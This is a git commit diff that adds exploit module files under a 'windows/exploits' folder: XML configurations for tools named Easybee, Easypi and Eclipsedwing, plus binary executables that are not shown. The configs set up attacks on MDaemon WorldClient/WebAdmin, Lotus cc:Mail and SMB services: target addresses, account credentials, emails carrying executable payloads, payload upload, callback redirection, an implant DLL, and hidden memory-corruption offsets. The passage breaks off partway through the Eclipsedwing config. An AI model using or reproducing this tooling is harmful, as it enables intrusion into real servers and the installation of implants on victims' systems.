This commit is contained in:
mstrch0c
commit
bc8ff5f44a
6520 changed files with 426985 additions and 0 deletions
8
windows/exploits/Easybee-1.0.1.0.fb
Normal file
8
windows/exploits/Easybee-1.0.1.0.fb
Normal file
|
|
@ -0,0 +1,8 @@
|
|||
<?xml version="1.0"?>
|
||||
<t:config id="d9d52d9866d564e35cfcd46994b1a0882546df0e"
|
||||
name="Easybee"
|
||||
version="1.0.1"
|
||||
configversion="1.0.1.0"
|
||||
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
|
||||
xmlns:t='tc0'>
|
||||
</t:config>
|
||||
201
windows/exploits/Easybee-1.0.1.0.xml
Normal file
201
windows/exploits/Easybee-1.0.1.0.xml
Normal file
|
|
@ -0,0 +1,201 @@
|
|||
<?xml version="1.0"?>
|
||||
<t:config id="d9d52d9866d564e35cfcd46994b1a0882546df0e"
|
||||
name="Easybee"
|
||||
version="1.0.1"
|
||||
configversion="1.0.1.0"
|
||||
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
|
||||
xmlns:t='tc0'>
|
||||
|
||||
<t:inputparameters>
|
||||
|
||||
<!-- Parameters for specific versions -->
|
||||
<!--
|
||||
//versionspecificGetInbox - Seemingly fixed string appended to URL to select the Inbox
|
||||
//For 9.6.x: "View=List&ContentType=javascript&ReturnJavaScript=1&FolderID=1&Page=0¤tRequest=0"
|
||||
// could use: "View=List&Folder=Inbox"
|
||||
//For 10.0.x: "view=List&ReturnJavaScript=1&FolderID=0&ReturnDif=Yes&XMLHTTP=1"
|
||||
|
||||
//versionspecificGetMsgID - Give it a subject-line identifier string, it selects the message identifier number
|
||||
//There are two observed formats. One appears to come from the "diff" response, and the other from the "full" response.
|
||||
//M({n:4, i:1, unr:1, del:0, att:0, urg:0, bnw:0, frw:0, rpl:0, frm:"joe shmoo", sbj:"Autoresponder Trigger 0188439095", dt:"03/16/2009 10:53 AM", sz:9});
|
||||
//scripts.push({id:2, i:0, unr:1, del:0, att:0, urg:0, bnw:1, frw:0, rpl:0, frm:"Joe Shmoo", sbj:"Autoresponder Trigger 1025304777", dt:"01/08/2009 03:01 PM", sz:4,depth:0, hasChildren:0});
|
||||
//use: <t:parameter name="versionspecificGetMsgID" description="" type="String" value="\({[^\n})]*\b(?:id|n):([0-9]+),[^\n})]*\bsbj:"%s"[^\n})]*}\);" hidden="true" />
|
||||
|
||||
//also,
|
||||
//<td><a name="3" href="/WorldClient.dll?Session=PXTSWDE&View=Message&Number=3&Page=1"><strong>Autoresponder Trigger xKwwQoQwG1</strong></a></td>
|
||||
//use: View=Message&(?:amp;)*Number=([0-9]+)&(?:amp;)*Page=[0-9]*#x22;[^>]*>[^<]*<strong>%s</strong>
|
||||
-->
|
||||
<t:paramchoice name="WorldClientVersion" description="The version of WorldClient used by the target">
|
||||
|
||||
<t:paramgroup name="9.5.2" description="">
|
||||
<t:parameter name="versionspecificGetInbox" description="" type="String" value="View=List&amp;amp;ContentType=javascript&amp;amp;ReturnJavaScript=1&amp;amp;FolderID=1&amp;amp;Page=0&amp;amp;currentRequest=0" hidden="true" />
|
||||
<t:parameter name="versionspecificGetMsgID" description="" type="String" value="(?:(?:\({[^\n})]*\b(?:id|n):)|(?:View=Message&amp;amp;amp;*Number=))([0-9]+)(?:(?:,[^\n})]*\bsbj:"%s"[^\n})]*}\);)|(?:&amp;amp;amp;*Page=[0-9]*"[^>]*>[^<]*<strong>%s</strong>))" hidden="true" />
|
||||
</t:paramgroup>
|
||||
|
||||
<t:paramgroup name="9.6.0" description="">
|
||||
<t:parameter name="versionspecificGetInbox" description="" type="String" value="View=List&amp;amp;ContentType=javascript&amp;amp;ReturnJavaScript=1&amp;amp;FolderID=1&amp;amp;Page=0&amp;amp;currentRequest=0" hidden="true" />
|
||||
<t:parameter name="versionspecificGetMsgID" description="" type="String" value="(?:(?:\({[^\n})]*\b(?:id|n):)|(?:View=Message&amp;amp;amp;*Number=))([0-9]+)(?:(?:,[^\n})]*\bsbj:"%s"[^\n})]*}\);)|(?:&amp;amp;amp;*Page=[0-9]*"[^>]*>[^<]*<strong>%s</strong>))" hidden="true" />
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="9.6.1" description="">
|
||||
<t:parameter name="versionspecificGetInbox" description="" type="String" value="View=List&amp;amp;ContentType=javascript&amp;amp;ReturnJavaScript=1&amp;amp;FolderID=1&amp;amp;Page=0&amp;amp;currentRequest=0" hidden="true" />
|
||||
<t:parameter name="versionspecificGetMsgID" description="" type="String" value="(?:(?:\({[^\n})]*\b(?:id|n):)|(?:View=Message&amp;amp;amp;*Number=))([0-9]+)(?:(?:,[^\n})]*\bsbj:"%s"[^\n})]*}\);)|(?:&amp;amp;amp;*Page=[0-9]*"[^>]*>[^<]*<strong>%s</strong>))" hidden="true" />
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="9.6.2" description="">
|
||||
<t:parameter name="versionspecificGetInbox" description="" type="String" value="View=List&amp;amp;ContentType=javascript&amp;amp;ReturnJavaScript=1&amp;amp;FolderID=1&amp;amp;Page=0&amp;amp;currentRequest=0" hidden="true" />
|
||||
<t:parameter name="versionspecificGetMsgID" description="" type="String" value="(?:(?:\({[^\n})]*\b(?:id|n):)|(?:View=Message&amp;amp;amp;*Number=))([0-9]+)(?:(?:,[^\n})]*\bsbj:"%s"[^\n})]*}\);)|(?:&amp;amp;amp;*Page=[0-9]*"[^>]*>[^<]*<strong>%s</strong>))" hidden="true" />
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="9.6.3" description="">
|
||||
<t:parameter name="versionspecificGetInbox" description="" type="String" value="View=List&amp;amp;ContentType=javascript&amp;amp;ReturnJavaScript=1&amp;amp;FolderID=1&amp;amp;Page=0&amp;amp;currentRequest=0" hidden="true" />
|
||||
<t:parameter name="versionspecificGetMsgID" description="" type="String" value="(?:(?:\({[^\n})]*\b(?:id|n):)|(?:View=Message&amp;amp;amp;*Number=))([0-9]+)(?:(?:,[^\n})]*\bsbj:"%s"[^\n})]*}\);)|(?:&amp;amp;amp;*Page=[0-9]*"[^>]*>[^<]*<strong>%s</strong>))" hidden="true" />
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="9.6.4" description="">
|
||||
<t:parameter name="versionspecificGetInbox" description="" type="String" value="View=List&amp;amp;ContentType=javascript&amp;amp;ReturnJavaScript=1&amp;amp;FolderID=1&amp;amp;Page=0&amp;amp;currentRequest=0" hidden="true" />
|
||||
<t:parameter name="versionspecificGetMsgID" description="" type="String" value="(?:(?:\({[^\n})]*\b(?:id|n):)|(?:View=Message&amp;amp;amp;*Number=))([0-9]+)(?:(?:,[^\n})]*\bsbj:"%s"[^\n})]*}\);)|(?:&amp;amp;amp;*Page=[0-9]*"[^>]*>[^<]*<strong>%s</strong>))" hidden="true" />
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="9.6.5" description="">
|
||||
<t:parameter name="versionspecificGetInbox" description="" type="String" value="View=List&amp;amp;ContentType=javascript&amp;amp;ReturnJavaScript=1&amp;amp;FolderID=1&amp;amp;Page=0&amp;amp;currentRequest=0" hidden="true" />
|
||||
<t:parameter name="versionspecificGetMsgID" description="" type="String" value="(?:(?:\({[^\n})]*\b(?:id|n):)|(?:View=Message&amp;amp;amp;*Number=))([0-9]+)(?:(?:,[^\n})]*\bsbj:"%s"[^\n})]*}\);)|(?:&amp;amp;amp;*Page=[0-9]*"[^>]*>[^<]*<strong>%s</strong>))" hidden="true" />
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="9.6.6" description="">
|
||||
<t:parameter name="versionspecificGetInbox" description="" type="String" value="View=List&amp;amp;ContentType=javascript&amp;amp;ReturnJavaScript=1&amp;amp;FolderID=1&amp;amp;Page=0&amp;amp;currentRequest=0" hidden="true" />
|
||||
<t:parameter name="versionspecificGetMsgID" description="" type="String" value="(?:(?:\({[^\n})]*\b(?:id|n):)|(?:View=Message&amp;amp;amp;*Number=))([0-9]+)(?:(?:,[^\n})]*\bsbj:"%s"[^\n})]*}\);)|(?:&amp;amp;amp;*Page=[0-9]*"[^>]*>[^<]*<strong>%s</strong>))" hidden="true" />
|
||||
</t:paramgroup>
|
||||
|
||||
<!--This program does not work on Version 10.0.0, but the input parameters are the same as the other 10.0.x versions-->
|
||||
<t:paramgroup name="10.0.1" description="">
|
||||
<t:parameter name="versionspecificGetInbox" description="" type="String" value="view=List&amp;amp;ReturnJavaScript=1&amp;amp;FolderID=0&amp;amp;ReturnDif=Yes&amp;amp;XMLHTTP=1" hidden="true" />
|
||||
<t:parameter name="versionspecificGetMsgID" description="" type="String" value="(?:(?:\({[^\n})]*\b(?:id|n):)|(?:View=Message&amp;amp;amp;*Number=))([0-9]+)(?:(?:,[^\n})]*\bsbj:"%s"[^\n})]*}\);)|(?:&amp;amp;amp;*Page=[0-9]*"[^>]*>[^<]*<strong>%s</strong>))" hidden="true" />
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="10.0.2" description="">
|
||||
<t:parameter name="versionspecificGetInbox" description="" type="String" value="view=List&amp;amp;ReturnJavaScript=1&amp;amp;FolderID=0&amp;amp;ReturnDif=Yes&amp;amp;XMLHTTP=1" hidden="true" />
|
||||
<t:parameter name="versionspecificGetMsgID" description="" type="String" value="(?:(?:\({[^\n})]*\b(?:id|n):)|(?:View=Message&amp;amp;amp;*Number=))([0-9]+)(?:(?:,[^\n})]*\bsbj:"%s"[^\n})]*}\);)|(?:&amp;amp;amp;*Page=[0-9]*"[^>]*>[^<]*<strong>%s</strong>))" hidden="true" />
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="10.0.3" description="">
|
||||
<t:parameter name="versionspecificGetInbox" description="" type="String" value="view=List&amp;amp;ReturnJavaScript=1&amp;amp;FolderID=0&amp;amp;ReturnDif=Yes&amp;amp;XMLHTTP=1" hidden="true" />
|
||||
<t:parameter name="versionspecificGetMsgID" description="" type="String" value="(?:(?:\({[^\n})]*\b(?:id|n):)|(?:View=Message&amp;amp;amp;*Number=))([0-9]+)(?:(?:,[^\n})]*\bsbj:"%s"[^\n})]*}\);)|(?:&amp;amp;amp;*Page=[0-9]*"[^>]*>[^<]*<strong>%s</strong>))" hidden="true" />
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="10.0.4" description="">
|
||||
<t:parameter name="versionspecificGetInbox" description="" type="String" value="view=List&amp;amp;ReturnJavaScript=1&amp;amp;FolderID=0&amp;amp;ReturnDif=Yes&amp;amp;XMLHTTP=1" hidden="true" />
|
||||
<t:parameter name="versionspecificGetMsgID" description="" type="String" value="(?:(?:\({[^\n})]*\b(?:id|n):)|(?:View=Message&amp;amp;amp;*Number=))([0-9]+)(?:(?:,[^\n})]*\bsbj:"%s"[^\n})]*}\);)|(?:&amp;amp;amp;*Page=[0-9]*"[^>]*>[^<]*<strong>%s</strong>))" hidden="true" />
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="10.0.5" description="">
|
||||
<t:parameter name="versionspecificGetInbox" description="" type="String" value="view=List&amp;amp;ReturnJavaScript=1&amp;amp;FolderID=0&amp;amp;ReturnDif=Yes&amp;amp;XMLHTTP=1" hidden="true" />
|
||||
<t:parameter name="versionspecificGetMsgID" description="" type="String" value="(?:(?:\({[^\n})]*\b(?:id|n):)|(?:View=Message&amp;amp;amp;*Number=))([0-9]+)(?:(?:,[^\n})]*\bsbj:"%s"[^\n})]*}\);)|(?:&amp;amp;amp;*Page=[0-9]*"[^>]*>[^<]*<strong>%s</strong>))" hidden="true" />
|
||||
</t:paramgroup>
|
||||
|
||||
<t:paramgroup name="10.1.0" description="">
|
||||
<t:parameter name="versionspecificGetInbox" description="" type="String" value="view=List&amp;amp;ReturnJavaScript=1&amp;amp;FolderID=0&amp;amp;ReturnDif=Yes&amp;amp;XMLHTTP=1" hidden="true" />
|
||||
<t:parameter name="versionspecificGetMsgID" description="" type="String" value="(?:(?:\({[^\n})]*\b(?:id|n):)|(?:View=Message&amp;amp;amp;*Number=))([0-9]+)(?:(?:,[^\n})]*\bsbj:"%s"[^\n})]*}\);)|(?:&amp;amp;amp;*Page=[0-9]*"[^>]*>[^<]*<strong>%s</strong>))" hidden="true" />
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="10.1.1" description="">
|
||||
<t:parameter name="versionspecificGetInbox" description="" type="String" value="view=List&amp;amp;ReturnJavaScript=1&amp;amp;FolderID=0&amp;amp;ReturnDif=Yes&amp;amp;XMLHTTP=1" hidden="true" />
|
||||
<t:parameter name="versionspecificGetMsgID" description="" type="String" value="(?:(?:\({[^\n})]*\b(?:id|n):)|(?:View=Message&amp;amp;amp;*Number=))([0-9]+)(?:(?:,[^\n})]*\bsbj:"%s"[^\n})]*}\);)|(?:&amp;amp;amp;*Page=[0-9]*"[^>]*>[^<]*<strong>%s</strong>))" hidden="true" />
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="10.1.2" description="">
|
||||
<t:parameter name="versionspecificGetInbox" description="" type="String" value="view=List&amp;amp;ReturnJavaScript=1&amp;amp;FolderID=0&amp;amp;ReturnDif=Yes&amp;amp;XMLHTTP=1" hidden="true" />
|
||||
<t:parameter name="versionspecificGetMsgID" description="" type="String" value="(?:(?:\({[^\n})]*\b(?:id|n):)|(?:View=Message&amp;amp;amp;*Number=))([0-9]+)(?:(?:,[^\n})]*\bsbj:"%s"[^\n})]*}\);)|(?:&amp;amp;amp;*Page=[0-9]*"[^>]*>[^<]*<strong>%s</strong>))" hidden="true" />
|
||||
</t:paramgroup>
|
||||
|
||||
</t:paramchoice>
|
||||
|
||||
<!-- Parameters for the target machine -->
|
||||
<t:parameter name="TargetIp" type="IPv4" description="Target IPv4 Address (dot notation)" />
|
||||
<t:parameter name="TargetWCPort" type="TcpPort" description="Target Port Number for WorldClient connection" />
|
||||
<t:parameter name="TargetWAPort" type="TcpPort" description="Target Port Number for WebAdmin connection" />
|
||||
|
||||
<!-- Parameters for the WorldClient server -->
|
||||
<t:parameter name="WorldClientProtocol" type="String" description="WorldClient Protocol (http, https)" binding="//service[product/name='MDaemon WorldClient']/name" /> <!-- Replace this with an explicit choice of only "http" or "https" -->
|
||||
<t:parameter name="WorldClientDomain" type="String" description="WorldClient Address (domain name or IP address)" binding="//identifier" />
|
||||
<t:parameter name="WorldClientPort" type="TcpPort" description="WorldClient Port Number" binding="//service[product/name='MDaemon WorldClient']/port" />
|
||||
|
||||
<!-- Parameters for the WebAdmin server -->
|
||||
<t:parameter name="WebAdminProtocol" type="String" description="WebAdmin Protocol (http, https)" binding="//service[product/name='MDaemon WebAdmin']/name" /> <!-- Replace this with an explicit choice of only "http" or "https" -->
|
||||
<t:parameter name="WebAdminDomain" type="String" description="WebAdmin Address (domain name or IP address)" binding="//identifier" />
|
||||
<t:parameter name="WebAdminPort" type="TcpPort" description="WebAdmin Port Number" binding="//service[product/name='MDaemon WebAdmin']/port" />
|
||||
|
||||
<!-- Parameters for the target account -->
|
||||
<t:parameter name="TargetAcctDomain" type="String" description="Target account email domain"/>
|
||||
<t:parameter name="TargetAcctUsr" type="String" description="Target account username"/>
|
||||
<t:parameter name="TargetAcctPwd" type="String" description="Target account password"/>
|
||||
<t:parameter name="TargetAcctIsAdmin" type="String" description="Target account administrator status"/>
|
||||
|
||||
<!-- Parameters for the email triggering the content filter -->
|
||||
<t:parameter name="CFEmailFrom" type="String" description="Asserted sender for email triggering the content filter"/>
|
||||
<t:parameter name="CFEmailSubj" type="String" description="Subject line for email triggering the content filter"/>
|
||||
<t:parameter name="CFEmailFile" type="String" description="Filename of attachment (executable payload) on email triggering the content filter"/>
|
||||
|
||||
<!-- Parameters for the email triggering the auto responder -->
|
||||
<t:parameter name="AREmailFrom" type="String" description="Asserted sender for email triggering the auto responder"/>
|
||||
<t:parameter name="AREmailSubj" type="String" description="Subject line for email triggering the auto responder"/>
|
||||
|
||||
<!-- Parameters for the (pass through) email not triggering the content filter of auto responder -->
|
||||
<t:parameter name="PTEmailFrom" type="String" description="Asserted sender for email ignored by content filter"/>
|
||||
<t:parameter name="PTEmailSubj" type="String" description="Subject line for email ignored by content filter"/>
|
||||
|
||||
<!-- Parameters for the payload -->
|
||||
<t:parameter name="PayloadName" type="String" description="Filename for executable payload once on the target"/>
|
||||
<t:parameter name="PayloadFile" type="String" description="Path to payload to be uploaded to the target"/>
|
||||
|
||||
</t:inputparameters>
|
||||
|
||||
<t:redirection>
|
||||
<t:local protocol="TCP"
|
||||
listenaddr="TargetIp"
|
||||
listenport="TargetWCPort"
|
||||
destaddr="//identifier"
|
||||
destport="//service[product/name='MDaemon WorldClient']/port"
|
||||
closeoncompletion="true"/>
|
||||
<t:local protocol="TCP"
|
||||
listenaddr="TargetIp"
|
||||
listenport="TargetWAPort"
|
||||
destaddr="//identifier"
|
||||
destport="//service[product/name='MDaemon WebAdmin']/port"
|
||||
closeoncompletion="true"/>
|
||||
</t:redirection>
|
||||
|
||||
<t:logic>
|
||||
<t:and>
|
||||
|
||||
<t:or>
|
||||
<t:service name="https">
|
||||
<t:product name="MDaemon WorldClient" />
|
||||
<!--
|
||||
<t:bindtovalue name="WorldClientProtocol" value="https"/>
|
||||
<t:bindtopath name="WorldClientDomain" path="//identifier"/>
|
||||
<t:bindtopath name="WorldClientPort" path="//service[product/name='MDaemon WorldClient']/port"/>
|
||||
-->
|
||||
</t:service>
|
||||
|
||||
<t:service name="http">
|
||||
<t:product name="MDaemon WorldClient" />
|
||||
<!--
|
||||
<t:bindtovalue name="WorldClientProtocol" value="http"/>
|
||||
<t:bindtopath name="WorldClientDomain" path="//identifier"/>
|
||||
<t:bindtopath name="WorldClientPort" path="//service[product/name='MDaemon WorldClient']/port"/>
|
||||
-->
|
||||
</t:service>
|
||||
</t:or>
|
||||
|
||||
<t:or>
|
||||
<t:service name="https">
|
||||
<t:product name="MDaemon WebAdmin" />
|
||||
<!--
|
||||
<t:bindtovalue name="WebAdminProtocol" value="https"/>
|
||||
<t:bindtopath name="WebAdminDomain" path="//identifier"/>
|
||||
<t:bindtopath name="WebAdminPort" path="//service[product/name='MDaemon WebAdmin']/port"/>
|
||||
-->
|
||||
</t:service>
|
||||
|
||||
<t:service name="http">
|
||||
<t:product name="MDaemon WebAdmin" />
|
||||
<!--
|
||||
<t:bindtovalue name="WebAdminProtocol" value="http"/>
|
||||
<t:bindtopath name="WebAdminDomain" path="//identifier"/>
|
||||
<t:bindtopath name="WebAdminPort" path="//service[product/name='MDaemon WebAdmin']/port"/>
|
||||
-->
|
||||
</t:service>
|
||||
</t:or>
|
||||
|
||||
</t:and>
|
||||
</t:logic>
|
||||
</t:config>
|
||||
BIN
windows/exploits/Easybee-1.0.1.exe
Normal file
BIN
windows/exploits/Easybee-1.0.1.exe
Normal file
Binary file not shown.
8
windows/exploits/Easypi-3.1.0.0.fb
Normal file
8
windows/exploits/Easypi-3.1.0.0.fb
Normal file
|
|
@ -0,0 +1,8 @@
|
|||
<?xml version="1.0"?>
|
||||
<t:config id="b262fec9933caa4d9cdb704b916bb3ffd8269450"
|
||||
name="Easypi"
|
||||
version="3.1.0"
|
||||
configversion="3.1.0.0"
|
||||
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
|
||||
xmlns:t='tc0'>
|
||||
</t:config>
|
||||
67
windows/exploits/Easypi-3.1.0.0.xml
Normal file
67
windows/exploits/Easypi-3.1.0.0.xml
Normal file
|
|
@ -0,0 +1,67 @@
|
|||
<?xml version="1.0"?>
|
||||
<t:config id="c72514379eaad943b62f4080a5ae1dc61619f0f3"
|
||||
name="Easypi"
|
||||
version="3.1.0"
|
||||
configversion="3.1.0.0"
|
||||
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
|
||||
xmlns:t='tc0'>
|
||||
<t:inputparameters>
|
||||
<!-- All plugins that accept a callback must have the Callback* parameters
|
||||
listed below, or their equivalents. -->
|
||||
<t:parameter name="NetworkTimeout"
|
||||
description="Timeout for blocking network calls (in seconds). Use -1 for no timeout."
|
||||
type="S16"
|
||||
default="180"/>
|
||||
<t:parameter name="TargetIp"
|
||||
description="Target IP Address"
|
||||
type="IPv4"/>
|
||||
<t:parameter name="TargetPort"
|
||||
description="Port used by ccMail"
|
||||
type="TcpPort"
|
||||
default="3264"/>
|
||||
<t:parameter name="Connections"
|
||||
description="Number of parallel connections to attempt"
|
||||
type="S32"
|
||||
default="20"/>
|
||||
</t:inputparameters>
|
||||
|
||||
<t:outputparameters>
|
||||
<t:parameter name="ConnectedTcp"
|
||||
description="Connected TCP Socket to target"
|
||||
type="Socket"/>
|
||||
<t:parameter name="Contract"
|
||||
description="Plugin contract"
|
||||
type="String"
|
||||
value="StagedUpload" />
|
||||
<t:parameter name="XorMask"
|
||||
description=""
|
||||
type="U8"/>
|
||||
</t:outputparameters>
|
||||
|
||||
<t:redirection>
|
||||
<t:local protocol="TCP"
|
||||
listenaddr="TargetIp"
|
||||
listenport="TargetPort"
|
||||
destaddr="//identifier"
|
||||
destport="//service[name='ccmail']/port"
|
||||
closeoncompletion="true"/>
|
||||
<t:remote protocol="TCP"
|
||||
listenaddr="CallbackIp"
|
||||
listenport="CallbackPort"
|
||||
destport="CallbackLocalPort"/>
|
||||
</t:redirection>
|
||||
|
||||
<t:logic>
|
||||
<t:and>
|
||||
<t:service name="ccmail">
|
||||
<t:product name="Lotus cc:Mail"/>
|
||||
</t:service>
|
||||
<t:or>
|
||||
<t:os family="windows" name="Windows NT"/>
|
||||
<t:os family="windows" name="Windows 2000"/>
|
||||
<t:os family="windows" name="Windows XP"/>
|
||||
<t:os family="windows" name="Windows 2003"/>
|
||||
</t:or>
|
||||
</t:and>
|
||||
</t:logic>
|
||||
</t:config>
|
||||
BIN
windows/exploits/Easypi-3.1.0.exe
Normal file
BIN
windows/exploits/Easypi-3.1.0.exe
Normal file
Binary file not shown.
31
windows/exploits/Eclipsedwing-1.5.2.0.fb
Normal file
31
windows/exploits/Eclipsedwing-1.5.2.0.fb
Normal file
|
|
@ -0,0 +1,31 @@
|
|||
<?xml version="1.0"?>
|
||||
<t:config id="def84fcfbc30f146f982bf43d536f300bf2e6485"
|
||||
name="Eclipsedwing"
|
||||
version="1.5.2"
|
||||
configversion="1.5.2.0"
|
||||
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
|
||||
xmlns:t='tc0'>
|
||||
|
||||
<t:touchlist>
|
||||
<t:plugin name="Rpctouch"
|
||||
displayname="RPC Touch"
|
||||
description="Touch to get Target OS"
|
||||
postmessage="ECWI requires Target OS">
|
||||
<t:ivparam name="TargetPort" value="TargetPort"/>
|
||||
<t:ivparam name="TargetIp" value="TargetIp"/>
|
||||
<t:ivparam name="Protocol" value="Protocol"/>
|
||||
<t:ivparam name="NetworkTimeout" value="NetworkTimeout"/>
|
||||
<t:oparam name="Target" value="Target"/>
|
||||
<t:oparam name="Protocol" value="Protocol"/>
|
||||
</t:plugin>
|
||||
<t:plugin name="Eclipsedwingtouch"
|
||||
displayname="ECWI Vulnerability Touch"
|
||||
description="Check if Target is vulnerable to ECWI"
|
||||
postmessage="ECWI requires vulnerable target">
|
||||
<t:ivparam name="TargetPort" value="TargetPort"/>
|
||||
<t:ivparam name="TargetIp" value="TargetIp"/>
|
||||
<t:ivparam name="Protocol" value="Protocol"/>
|
||||
<t:ivparam name="NetworkTimeout" value="NetworkTimeout"/>
|
||||
</t:plugin>
|
||||
</t:touchlist>
|
||||
</t:config>
|
||||
341
windows/exploits/Eclipsedwing-1.5.2.0.xml
Normal file
341
windows/exploits/Eclipsedwing-1.5.2.0.xml
Normal file
|
|
@ -0,0 +1,341 @@
|
|||
<?xml version="1.0"?>
|
||||
<t:config id="def84fcfbc30f146f982bf43d536f300bf2e6485"
|
||||
name="Eclipsedwing"
|
||||
version="1.5.2"
|
||||
configversion="1.5.2.0"
|
||||
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
|
||||
xmlns:t='tc0'>
|
||||
|
||||
<t:inputparameters>
|
||||
|
||||
<t:parameter name="TargetIp" description="Target IP Address" type="IPv4" />
|
||||
<t:parameter name="TargetPort"
|
||||
description="Port used by Netbios or SMB"
|
||||
type="TcpPort" />
|
||||
<t:paramchoice name="Protocol" description="Protocol to connect to target with">
|
||||
<t:paramgroup name="SMB" description="SMB over TCP"/>
|
||||
<t:paramgroup name="NBT" description="Netbios over TCP"/>
|
||||
</t:paramchoice>
|
||||
<t:parameter name="NetworkTimeout"
|
||||
description="Timeout for blocking network calls (in seconds). Use -1 for no timeout."
|
||||
type="S16"
|
||||
default="60"/>
|
||||
|
||||
<t:parameter name="ClientName"
|
||||
description="Client SMB Name"
|
||||
type="String"
|
||||
hidden="true"
|
||||
default="*SMBCLIENT"/>
|
||||
<t:parameter name="ServerName"
|
||||
description="Server SMB name"
|
||||
type="String"
|
||||
hidden="true"
|
||||
default="*SMBSERVER"/>
|
||||
<t:paramchoice name="Payload" description="Listen or Callback paylaod" default="Callback">
|
||||
<t:paramgroup name="Callback" description="Callback payload">
|
||||
|
||||
<t:parameter name="CallbackIp" description="Callback IP address" type="IPv4"/>
|
||||
<t:parameter name="CallbackPort" description="Callback port" type="TcpPort" default="0"/>
|
||||
<t:parameter name="CallbackLocalPort" description="Local callback port" type="TcpPort" required="false"/>
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="RPCReuse" description="RPC Proxy payload">
|
||||
<t:parameter name="FbStorage"
|
||||
description="base path to implant payload dll"
|
||||
type="String"/>
|
||||
<t:parameter name="PayloadDll"
|
||||
description="implant payload dll name"
|
||||
type="String"
|
||||
default="wbemess2.dll"/>
|
||||
</t:paramgroup>
|
||||
<!--
|
||||
<t:paramgroup name="Listener" description="Listener payload">
|
||||
<t:parameter name="ListenPort" description="Listen port" type="TcpPort" default="0"/>
|
||||
<t:parameter name="CallinPort" description="Call in port" type="TcpPort" default="0"/>
|
||||
<t:parameter name="CallinTimeout" description="Timeout to wait before trying to connect in." type="S16" default="60"/>
|
||||
</t:paramgroup>
|
||||
-->
|
||||
</t:paramchoice>
|
||||
|
||||
<t:parameter name="PrefixLength" description="" type="U32" value="0xB8" hidden="true"/>
|
||||
<t:parameter name="BufferLength" description="" type="U32" value="0xFA0" hidden="true"/>
|
||||
<t:parameter name="ProcHandleOffset" description="" type="U32" value="0x08" hidden="true"/>
|
||||
<t:parameter name="ProcHandleOffset2" description="" type="U32" value="0x34" hidden="true"/>
|
||||
<t:parameter name="ProcHandleValue" description="" type="U32" value="0xFFFFFFFF" hidden="true"/>
|
||||
|
||||
<!-- the 0x0C offset is set from InitialEcxValue -->
|
||||
<t:parameter name="PtrRwSizeOffset" description="" type="U32" value="0x10" hidden="true"/>
|
||||
<t:parameter name="PtrRwSizeOffset2" description="" type="U32" value="0x3C" hidden="true"/>
|
||||
<t:parameter name="ExeFlagsOffset" description="" type="U32" value="0x14" hidden="true"/>
|
||||
<t:parameter name="ExeFlagsOffset2" description="" type="U32" value="0x40" hidden="true"/>
|
||||
<t:parameter name="ExeFlagsValue" description="" type="U32" value="0x00000040" hidden="true"/>
|
||||
<t:parameter name="UnpatchedRetOffset" description="" type="U32" value="0x1C" hidden="true"/>
|
||||
<t:parameter name="UnpatchedEcxOffset" description="" type="U32" value="0x20" hidden="true"/>
|
||||
<t:parameter name="PatchedEcxOffset" description="" type="U32" value="0x28" hidden="true"/>
|
||||
<t:parameter name="CommonRetOffset" description="" type="U32" value="0x24" hidden="true"/>
|
||||
<t:parameter name="LoadEaxPtrOffset" description="" type="U32" value="0x2C" hidden="true"/>
|
||||
<t:parameter name="LoadEaxPtrOffset2" description="" type="U32" value="0x70" hidden="true"/>
|
||||
<t:parameter name="EaxPtrOffset" description="" type="U32" value="0x30" hidden="true"/>
|
||||
<t:parameter name="AddEaxPtrEdxOffset" description="" type="U32" value="0x38" hidden="true"/>
|
||||
<t:parameter name="EbxToWriteableOffset" description="" type="U32" value="0x48" hidden="true"/>
|
||||
<t:parameter name="EbxPtrOffset" description="" type="U32" value="0x54" hidden="true"/>
|
||||
<t:parameter name="MovHeapPtrToEcxOffset" description="" type="U32" value="0x58" hidden="true"/>
|
||||
<t:parameter name="EaxNegValOffset" description="" type="U32" value="0x84" hidden="true"/>
|
||||
<t:parameter name="MovEcxEspOffset" description="" type="U32" value="0x8C" hidden="true"/>
|
||||
<t:parameter name="HeapRetAddrOffset" description="" type="U32" value="0x98" hidden="true"/>
|
||||
<t:parameter name="HeapRetAddrOffset2" description="" type="U32" value="0x20" hidden="true"/>
|
||||
<t:parameter name="HeapRetEbxOffset" description="" type="U32" value="0x68" hidden="true"/>
|
||||
<t:parameter name="HeapRetEbpOffset" description="" type="U32" value="0x88" hidden="true"/>
|
||||
<t:parameter name="HeapRetEsiOffset" description="" type="U32" value="0x40" hidden="true"/>
|
||||
<t:parameter name="PtrPtrHeapOffset" description="" type="U32" value="0x0C" hidden="true"/> <!-- used in buffer, not prefix - will be InitialEcxValue + 4 -->
|
||||
<t:parameter name="PtrPtrHeapOffset2" description="" type="U32" value="0x38" hidden="true"/> <!-- used in buffer, not prefix - will be InitialEcxValue + 4 -->
|
||||
<t:parameter name="GetExecutionToBufferOffset" description="" type="U32" value="0x04" hidden="true"/>
|
||||
<t:parameter name="GetExecutionToBufferOffset2" description="" type="U32" value="0x30" hidden="true"/>
|
||||
<t:parameter name="WriteMemoryOffset" description="" type="U32" value="0x18" hidden="true"/>
|
||||
<t:parameter name="WriteMemoryOffset2" description="" type="U32" value="0x44" hidden="true"/>
|
||||
<t:parameter name="WriteMemoryOffset3" description="" type="U32" value="0x1C" hidden="true"/>
|
||||
<t:parameter name="CallEcxOffset" description="" type="U32" value="0x4c" hidden="true"/>
|
||||
